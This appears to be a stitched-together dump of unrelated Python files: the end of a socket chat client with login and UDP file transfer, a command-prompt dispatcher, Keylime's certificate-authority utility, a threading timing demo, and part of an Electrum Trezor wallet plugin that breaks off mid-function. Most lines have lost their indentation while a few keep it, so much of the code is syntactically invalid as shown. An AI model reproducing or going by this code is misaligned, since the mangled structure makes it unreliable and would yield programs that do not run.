# It processes the reply info that comes from the server
def authenticate():
while True:
receivedMessage = clientSocket.recv(2048)
receivedMessage = receivedMessage.decode('utf-8')
if receivedMessage == "Username\r\n":
message = input("Username: ")
clientSocket.send(message.encode('utf-8'))
elif receivedMessage == "Password\r\n":
message = input("Password: ")
clientSocket.send(message.encode('utf-8'))
elif receivedMessage == "Invalid Password\r\n":
print("Invalid Password. Please try again\n")
message = input("Password: ")
clientSocket.send(message.encode('utf-8'))
# If return False, it means you are locked.
elif receivedMessage == "Locked\r\n":
print("Invalid Password. Your account has been blocked. Please try again later\n")
return False
elif receivedMessage == "Still locked\r\n":
print("Your account is blocked due to multiple login failures. Please try again later\n")
return False
elif receivedMessage == "Login Success\r\n":
clientSocket.send(udpPort.encode('utf-8'))
return True
# Process the server's reply to the MSG command
def msg(word):
# print(clientSocket)
confirm = clientSocket.recv(2048).decode('utf-8')
confirm = confirm.split()
time = ' '.join(confirm[1::])
message = 'Message ' + '#' + confirm[0] + ' ' + 'posted at ' + time + '.\n'
print(message)
# Process the server's reply to the DLT command
def dlt(infor):
infor = infor.split()
info = infor[0]
if info == 'Seq':
print('The sequence number you provided is invalid\n')
elif info == 'User':
print('You do not have the authority to delete this message\n')
elif info == 'Timestamp':
print('The timestamp you provided does not match the log. Please check\n')
elif info == 'Delete':
time = ' '.join(infor[1::])
print('The deletion at ' + time + ' is successful\n')
# Process the server's reply to the EDT command
def edt(infor):
infor = infor.split()
info = infor[0]
if info == 'Seq':
print('The sequence number you provided is invalid\n')
elif info == 'User':
print('You do not have the authority to delete this message\n')
elif info == 'Timestamp':
print('The timestamp you provided does not match the log. Please check\n')
elif info == 'Edit':
print("enter\n")
time = ' '.join(infor[1::])
print('The Edit operation at ' + time + ' is successful\n')
def upd():
pass
# The authenticate function will return true or false
# If true, the welcome message will be printed
ifloged = authenticate()
if ifloged:
    print("Welcome to TOOM!")
while ifloged:
allcommand = input("Enter one of the following commands (MSG, DLT, EDT, RDM, ATU, OUT, UPD):")
command = allcommand[0:3]
if command == 'MSG':
# Check the usage of this command
if allcommand == 'MSG':
print("Error! Need message after MSG command\n")
else:
clientSocket.send(allcommand.encode('utf-8'))
msg(allcommand[4::])
elif command == 'DLT':
# We need to check the usage of DLT
if allcommand == 'DLT':
print("Error! Need seq number and timestamp after DLT command\n")
        else:
            info = allcommand[4::]
            lists = info.split()
            if len(lists) <= 2:
                print("Error! Need seq number and timestamp after DLT command\n")
            else:
                clientSocket.send(allcommand.encode('utf-8'))
                recev = clientSocket.recv(2048).decode('utf-8')
                dlt(recev)
elif command == 'EDT':
if allcommand == 'EDT':
print("Error! Need seq number, timestamp, and modified message after EDT command\n")
else:
info = allcommand[4::]
lists = info.split()
if len(lists) <= 2:
print("Error! Need seq number, timestamp, and modified message after EDT command\n")
else:
clientSocket.send(allcommand.encode('utf-8'))
recev = clientSocket.recv(2048).decode('utf-8')
edt(recev)
elif command == 'RDM':
if allcommand == 'RDM':
print("Error! Need timestamp after EDT command\n")
else:
info = allcommand[4::]
clientSocket.send(allcommand.encode('utf-8'))
recev = clientSocket.recv(2048).decode('utf-8')
print(recev)
elif command == 'ATU':
if allcommand == command:
clientSocket.send('ATU'.encode('utf-8'))
print('The active user list returned: \n')
            info = clientSocket.recv(2048).decode('utf-8')
            print(info)
else:
print("Error! ATU command does not take any argument.\n")
elif command == 'UPD':
if allcommand == 'UPD':
print("Error! Need filename and username after MSG command\n")
else:
info = allcommand[4::]
info = info.split()
# The username and filename
recevname = info[0]
file = info[-1]
# The new filename
filename = '_'.join(info)
            # Need to check if the username is online
clientSocket.send(recevname.encode('utf-8'))
msg = clientSocket.recv(1024).decode('utf-8')
# If offline, then print offline
if msg == 'Offline':
print(recevname +' is offline\n')
            else:
                msg = msg.split()
                # First we send the filename to the audience
                udpsock.sendto(filename.encode('utf-8'), (msg[0], int(msg[1])))
                f = open(file, 'rb')
                line = f.read(1024)
                while line:
                    udpsock.sendto(line, (msg[0], int(msg[1])))
                    line = f.read(1024)
                f.close()
elif command == 'OUT':
if allcommand == command:
clientSocket.send('OUT'.encode('utf-8'))
info = clientSocket.recv(2048).decode('utf-8')
print("Thank you for using. You have logged out.\n")
break
else:
print("Error! OUT command does not take any argument.\n")
else:
print("This command is invalid. Please try again with either one of MSG, DLT, EDT, RDM, ATU, OUT and UPD\n")
clientSocket.close()
|
main.py
|
import cmd, threading, queue
from typing import List
from .Component import Component
from .interface import execute as execute_interface, commands
from ..data.DictList import DictList
from ..utility.Logger import Logger
from ..utility.exception import exception
from ..utility.process import finalize
class _Main:
request = queue.Queue()
response = queue.Queue()
def main(components: List[Component] = list()):
# _Main.components.extend(components)
objects = [component() for component in components]
for component in objects:
component.initialize()
threading.Thread(target=_Prompt().cmdloop).start()
while True:
command, args, kwargs = _Main.request.get()
if command == "exit":
_Main.response.put("exit")
break
else:
try:
res = execute_interface(command, *args, **kwargs)
except Exception:
exception()
res = "error: exception"
_Main.response.put(res)
for component in objects:
component.finalize()
finalize()
def execute(command: str, *args, **kwargs):
_Main.request.put((command, args, kwargs))
return _Main.response.get()
class _Prompt(cmd.Cmd):
prompt = f" ] "
def preloop(self):
self.INFO = Logger("main").INFO
self.commands()
self.INFO(f"- help: print commands")
self.INFO(f"- exit: quit the prompt")
def precmd(self, args):
inputs = args.split()
if len(inputs) == 1 and inputs[0] == "exit":
return execute("exit")
elif len(inputs) == 1 and inputs[0] == "help":
self.commands()
return ""
elif len(inputs) > 0:
res = execute(inputs[0], *inputs[1:])
if isinstance(res, DictList):
self.INFO(f"{' '.join(inputs)} =")
res.print(print=self.INFO)
else:
self.INFO(f"{' '.join(inputs)} = {res}")
return ""
return ""
def commands(self):
self.INFO(f"commands:")
for command in commands():
self.INFO(f"- {command}")
def do_exit(self, _):
return True
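# Illustrative sketch (not part of the original module): a minimal component
# and entry point, assuming Component subclasses only need the initialize()
# and finalize() hooks that main() calls above.
#
#     class EchoComponent(Component):
#         def initialize(self):
#             pass
#
#         def finalize(self):
#             pass
#
#     main([EchoComponent])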
|
ca_util.py
|
#!/usr/bin/python3
'''
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
Tools for creating a CA cert and signed server certs.
Divined from http://svn.osafoundation.org/m2crypto/trunk/tests/test_x509.py
The mk_temporary_xxx calls return a NamedTemporaryFile with certs.
Usage:
# Create a temporary CA cert and its private key
cacert, cakey = mk_temporary_cacert()
# Create a temporary server cert+key, signed by the CA
server_cert = mk_temporary_cert(cacert.name, cakey.name, '*.server.co.uk')
protips
# openssl verify -CAfile cacert.crt cacert.crt cert.crt
# openssl x509 -in cert.crt -noout -text
# openssl x509 -in cacert.crt -noout -text
'''
import sys
import os
import base64
import argparse
import datetime
import getpass
import glob
import zipfile
import io
import socket
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import time
import yaml
try:
from yaml import CSafeLoader as SafeLoader, CSafeDumper as SafeDumper
except ImportError:
from yaml import SafeLoader, SafeDumper
from cryptography import exceptions as crypto_exceptions
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from keylime import cmd_exec
from keylime import config
from keylime import crypto
from keylime import fs_util
from keylime import json
from keylime import revocation_notifier
from keylime import keylime_logging
logger = keylime_logging.init_logging('ca-util')
if config.CA_IMPL == 'cfssl':
from keylime import ca_impl_cfssl as ca_impl
elif config.CA_IMPL == 'openssl':
from keylime import ca_impl_openssl as ca_impl
else:
raise Exception("Unknown CA implementation: %s" % config.CA_IMPL)
global_password = None
def load_cert_by_path(cert_path):
cert = None
with open(cert_path, 'rb') as ca_file:
cert = x509.load_pem_x509_certificate(
data=ca_file.read(),
backend=default_backend(),
)
return cert
def setpassword(pw):
global global_password
if len(pw) == 0:
raise Exception("You must specify a password!")
global_password = pw
def cmd_mkcert(workingdir, name):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
cacert = load_cert_by_path('cacert.crt')
ca_pk = serialization.load_pem_private_key(
priv[0]['ca'],
password=None,
backend=default_backend()
)
cert, pk = ca_impl.mk_signed_cert(
cacert, ca_pk, name, priv[0]['lastserial'] + 1)
with open('%s-cert.crt' % name, 'wb') as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
priv[0][name] = pk.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption(),
)
# increment serial number after successful creation
priv[0]['lastserial'] += 1
write_private(priv)
with os.fdopen(os.open("%s-private.pem" % name, os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(priv[0][name])
with os.fdopen(os.open("%s-public.pem" % name, os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(pk.public_key().public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
))
cc = load_cert_by_path('%s-cert.crt' % name)
pubkey = cacert.public_key()
pubkey.verify(
cc.signature,
cc.tbs_certificate_bytes,
padding.PKCS1v15(),
cc.signature_hash_algorithm,
)
logger.info("Created certificate for name %s successfully in %s", name, workingdir)
except crypto_exceptions.InvalidSignature:
logger.error("ERROR: Cert does not validate against CA")
finally:
os.chdir(cwd)
def cmd_init(workingdir):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
rmfiles("*.pem")
rmfiles("*.crt")
rmfiles("*.zip")
rmfiles("*.der")
rmfiles("private.yml")
cacert, ca_pk, _ = ca_impl.mk_cacert() # pylint: disable=W0632
priv = read_private()
# write out keys
with open('cacert.crt', 'wb') as f:
f.write(cacert.public_bytes(serialization.Encoding.PEM))
priv[0]['ca'] = ca_pk.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption(),
)
# store the last serial number created.
# the CA is always serial # 1
priv[0]['lastserial'] = 1
write_private(priv)
with os.fdopen(os.open("ca-public.pem", os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(ca_pk.public_key().public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
))
# generate an empty crl
cacert_str = cacert.public_bytes(serialization.Encoding.PEM).decode()
crl = ca_impl.gencrl([], cacert_str, priv[0]['ca'].decode())
if isinstance(crl, str):
crl = crl.encode('utf-8')
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
# Sanity checks...
cac = load_cert_by_path('cacert.crt')
pubkey = cacert.public_key()
pubkey.verify(
cac.signature,
cac.tbs_certificate_bytes,
padding.PKCS1v15(),
cac.signature_hash_algorithm,
)
logger.info("CA certificate created successfully in %s", workingdir)
except crypto_exceptions.InvalidSignature:
logger.error("ERROR: Cert does not self validate")
finally:
os.chdir(cwd)
def cmd_certpkg(workingdir, name, insecure=False):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
# zip up the crt, private key, and public key
with open('cacert.crt', 'rb') as f:
cacert = f.read()
with open(f"{name}-public.pem", 'rb') as f:
pub = f.read()
with open(f"{name}-cert.crt", 'rb') as f:
cert = f.read()
with open('cacrl.der', 'rb') as f:
crl = f.read()
with open('cacrl.pem', 'rb') as f:
crlpem = f.read()
cert_obj = x509.load_pem_x509_certificate(
data=cert,
backend=default_backend(),
)
serial = cert_obj.serial_number
subject = cert_obj.subject.rfc4514_string()
priv = read_private()
private = priv[0][name]
with open(f"{name}-private.pem", 'rb') as f:
prot_priv = f.read()
# no compression to avoid extraction errors in tmpfs
sf = io.BytesIO()
with zipfile.ZipFile(sf, 'w', compression=zipfile.ZIP_STORED) as f:
f.writestr(f"{name}-public.pem", pub)
f.writestr(f"{name}-cert.crt", cert)
f.writestr(f"{name}-private.pem", private)
f.writestr('cacert.crt', cacert)
f.writestr('cacrl.der', crl)
f.writestr('cacrl.pem', crlpem)
pkg = sf.getvalue()
if insecure:
logger.warning(
"Unprotected private keys in cert package being written to disk")
with open(f'{name}-pkg.zip', 'wb') as f:
f.write(pkg)
else:
# actually output the package to disk with a protected private key
with zipfile.ZipFile('%s-pkg.zip' % name, 'w', compression=zipfile.ZIP_STORED) as f:
f.writestr(f"{name}-public.pem", pub)
f.writestr(f"{name}-cert.crt", cert)
f.writestr(f"{name}-private.pem", prot_priv)
f.writestr('cacert.crt', cacert)
f.writestr('cacrl.der', crl)
f.writestr('cacrl.pem', crlpem)
logger.info("Creating cert package for %s in %s-pkg.zip",
name, name)
return pkg, serial, subject
finally:
os.chdir(cwd)
def convert_crl_to_pem(derfile, pemfile):
if config.get('general', 'ca_implementation') == 'openssl':
with open(pemfile, 'w', encoding="utf-8") as f:
f.write("")
else:
cmd = ('openssl', 'crl', '-in', derfile, '-inform', 'der',
'-out', pemfile)
cmd_exec.run(cmd)
def get_crl_distpoint(cert_path):
cert_obj = load_cert_by_path(cert_path)
try:
crl_distpoints = cert_obj.extensions.get_extension_for_class(x509.CRLDistributionPoints).value
for dstpnt in crl_distpoints:
for point in dstpnt.full_name:
if isinstance(point, x509.general_name.UniformResourceIdentifier):
return point.value
except x509.extensions.ExtensionNotFound:
pass
logger.info("No CRL distribution points in %s", cert_path)
return ""
# to check: openssl crl -inform DER -text -noout -in cacrl.der
def cmd_revoke(workingdir, name=None, serial=None):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
if name is not None and serial is not None:
raise Exception(
"You may not specify a cert and a serial at the same time")
if name is None and serial is None:
raise Exception("You must specify a cert or a serial to revoke")
if name is not None:
# load up the cert
cert = load_cert_by_path(f'{name}-cert.crt')
serial = cert.serial_number
# convert serial to string
serial = str(serial)
# get the ca key cert and keys as strings
with open('cacert.crt', encoding="utf-8") as f:
cacert = f.read()
ca_pk = priv[0]['ca'].decode('utf-8')
if serial not in priv[0]['revoked_keys']:
priv[0]['revoked_keys'].append(serial)
crl = ca_impl.gencrl(priv[0]['revoked_keys'], cacert, ca_pk)
write_private(priv)
# write out the CRL to the disk
if os.stat('cacrl.der').st_size:
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
finally:
os.chdir(cwd)
return crl
# regenerate the crl without revoking anything
def cmd_regencrl(workingdir):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
# get the ca key cert and keys as strings
with open('cacert.crt', encoding="utf-8") as f:
cacert = f.read()
ca_pk = priv[0]['ca'].decode()
crl = ca_impl.gencrl(priv[0]['revoked_keys'], cacert, ca_pk)
write_private(priv)
# write out the CRL to the disk
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
finally:
os.chdir(cwd)
return crl
def cmd_listen(workingdir, cert_path):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
# just load up the password for later
read_private(True)
serveraddr = ('', config.CRL_PORT)
server = ThreadedCRLServer(serveraddr, CRLHandler)
if os.path.exists('cacrl.der'):
logger.info("Loading existing crl: %s",
os.path.abspath("cacrl.der"))
with open('cacrl.der', 'rb') as f:
server.setcrl(f.read())
t = threading.Thread(target=server.serve_forever)
logger.info("Hosting CRL on %s:%d",
socket.getfqdn(), config.CRL_PORT)
t.start()
def check_expiration():
logger.info("checking CRL for expiration every hour")
while True: # pylint: disable=R1702
try:
if (os.path.exists('cacrl.der') and
os.stat('cacrl.der').st_size):
cmd = ('openssl', 'crl', '-inform', 'der', '-in',
'cacrl.der', '-text', '-noout')
retout = cmd_exec.run(cmd)['retout']
for line in retout:
line = line.strip()
if line.startswith(b"Next Update:"):
expire = datetime.datetime.strptime(
line[13:].decode('utf-8'), "%b %d %H:%M:%S %Y %Z")
# check expiration within 6 hours
in1hour = datetime.datetime.utcnow() + datetime.timedelta(hours=6)
if expire <= in1hour:
logger.info(
"Certificate to expire soon %s, re-issuing", expire)
cmd_regencrl(workingdir)
# check a little less than every hour
time.sleep(3540)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
# server.shutdown()
break
t2 = threading.Thread(target=check_expiration)
t2.setDaemon(True)
t2.start()
def revoke_callback(revocation):
json_meta = json.loads(revocation['meta_data'])
serial = json_meta['cert_serial']
if revocation.get('type', None) != 'revocation' or serial is None:
logger.error("Unsupported revocation message: %s", revocation)
return
logger.info("Revoking certificate: %s", serial)
server.setcrl(cmd_revoke(workingdir, None, serial))
try:
while True:
try:
revocation_notifier.await_notifications(
revoke_callback, revocation_cert_path=cert_path)
except Exception as e:
logger.exception(e)
logger.warning(
"No connection to revocation server, retrying in 10s...")
time.sleep(10)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
server.shutdown()
sys.exit()
finally:
os.chdir(cwd)
class ThreadedCRLServer(ThreadingMixIn, HTTPServer):
published_crl = None
def setcrl(self, crl):
self.published_crl = crl
class CRLHandler(BaseHTTPRequestHandler):
def do_GET(self):
logger.info('GET invoked from %s with uri: %s', str(self.client_address), self.path)
if self.server.published_crl is None:
self.send_response(404)
self.end_headers()
else:
# send back the CRL
self.send_response(200)
self.end_headers()
self.wfile.write(self.server.published_crl)
def rmfiles(path):
files = glob.glob(path)
for f in files:
os.remove(f)
def write_private(inp):
priv = inp[0]
salt = inp[1]
global global_password
priv_encoded = yaml.dump(priv, Dumper=SafeDumper)
key = crypto.kdf(global_password, salt)
ciphertext = crypto.encrypt(priv_encoded, key)
towrite = {'salt': salt, 'priv': ciphertext}
with os.fdopen(os.open('private.yml', os.O_WRONLY | os.O_CREAT, 0o600), 'w', encoding="utf-8") as f:
yaml.dump(towrite, f, Dumper=SafeDumper)
def read_private(warn=False):
global global_password
if global_password is None:
setpassword(getpass.getpass(
"Please enter the password to decrypt your keystore: "))
if os.path.exists('private.yml'):
with open('private.yml', encoding="utf-8") as f:
toread = yaml.load(f, Loader=SafeLoader)
key = crypto.kdf(global_password, toread['salt'])
try:
plain = crypto.decrypt(toread['priv'], key)
except ValueError as e:
raise Exception("Invalid password for keystore") from e
return yaml.load(plain, Loader=SafeLoader), toread['salt']
if warn:
# file doesn't exist, just invent a salt
logger.warning("Private certificate data %s does not exist yet.",
os.path.abspath("private.yml"))
logger.warning(
"Keylime will attempt to load private certificate data again when it is needed.")
return {'revoked_keys': []}, base64.b64encode(crypto.generate_random_key()).decode()
def main(argv=sys.argv):
parser = argparse.ArgumentParser(argv[0])
parser.add_argument('-c', '--command', action='store', dest='command',
required=True, help="valid commands are init,create,pkg,revoke,listen")
parser.add_argument('-n', '--name', action='store',
help='the common name of the certificate to create')
parser.add_argument('-d', '--dir', action='store',
help='use a custom directory to store certificates and keys')
parser.add_argument('-i', '--insecure', action='store_true', default=False,
help='create cert packages with unprotected private keys and write them to disk. USE WITH CAUTION!')
args = parser.parse_args(argv[1:])
if args.dir is None:
if os.getuid() != 0 and config.REQUIRE_ROOT:
logger.error(
"If you don't specify a working directory, this process must be run as root to access %s", config.WORK_DIR)
sys.exit(-1)
workingdir = config.CA_WORK_DIR
else:
workingdir = args.dir
# set a conservative general umask
os.umask(0o077)
if args.command == 'init':
cmd_init(workingdir)
elif args.command == 'create':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_mkcert(workingdir, args.name)
elif args.command == 'pkg':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_certpkg(workingdir, args.name, args.insecure)
elif args.command == 'revoke':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_revoke(workingdir, args.name)
elif args.command == 'listen':
if args.name is None:
args.name = os.path.join(workingdir, 'RevocationNotifier-cert.crt')
logger.warning("using default name for revocation cert %s",
args.name)
cmd_listen(workingdir, args.name)
else:
logger.error("Invalid command: %s", args.command)
parser.print_help()
sys.exit(-1)
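# Illustrative invocations (not part of the original module); the working
# directory is an assumption and the script name depends on how keylime is
# installed. Commands correspond to the argparse choices above:
#
#   python3 ca_util.py -c init -d /tmp/myca
#   python3 ca_util.py -c create -n server.example.com -d /tmp/myca
#   python3 ca_util.py -c pkg -n server.example.com -d /tmp/myca
#   python3 ca_util.py -c revoke -n server.example.com -d /tmp/myca
#   python3 ca_util.py -c listen -d /tmp/myca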
|
example2.py
|
import time
import threading
COUNT = 50000000
def countdown(n):
while n > 0:
n -= 1
###########################################################################
start = time.time()
countdown(COUNT)
print('Sequential program finished.')
print(f'Took {time.time() - start : .2f} seconds.')
###########################################################################
thread1 = threading.Thread(target=countdown, args=(COUNT // 2,))
thread2 = threading.Thread(target=countdown, args=(COUNT // 2,))
start = time.time()
thread1.start()
thread2.start()
thread1.join()
thread2.join()
print('Concurrent program finished.')
print(f'Took {time.time() - start : .2f} seconds.')
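###########################################################################
# Illustrative addition (not part of the original example): countdown() is
# CPU-bound, so the threaded version above is serialized by the GIL. Separate
# processes sidestep the GIL; note that on platforms using the "spawn" start
# method the timing code above would also need a __main__ guard.
import multiprocessing

if __name__ == '__main__':
    start = time.time()
    proc1 = multiprocessing.Process(target=countdown, args=(COUNT // 2,))
    proc2 = multiprocessing.Process(target=countdown, args=(COUNT // 2,))
    proc1.start()
    proc2.start()
    proc1.join()
    proc2.join()
    print('Multiprocessing program finished.')
    print(f'Took {time.time() - start : .2f} seconds.')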
|
trezor.py
|
import traceback
import sys
from typing import NamedTuple, Any
from electrum_sum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum_sum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum_sum.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum_sum import constants
from electrum_sum.i18n import _
from electrum_sum.plugin import Device
from electrum_sum.transaction import deserialize, Transaction
from electrum_sum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_sum.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum_sum.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
RECOVERY_TYPE_SCRAMBLED_WORDS = RecoveryDeviceType.ScrambledWords
RECOVERY_TYPE_MATRIX = RecoveryDeviceType.Matrix
TREZORLIB = True
except Exception as e:
_logger.exception('error importing trezorlib')
TREZORLIB = False
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(2)
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 11, 0)
maximum_library = (0, 12)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def enumerate(self):
# If there is a bridge, prefer that.
# On Windows, the bridge runs as Admin (and Electrum usually does not),
# so the bridge has better chances of finding devices. see #5420
# This also avoids duplicate entries.
try:
call_bridge("enumerate")
except Exception:
devices = trezorlib.transport.enumerate_devices()
else:
devices = BridgeTransport.enumerate()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Sumcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength_from_word_count = {12: 128, 18: 192, 24: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise OutdatedHwFirmwareException(msg)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
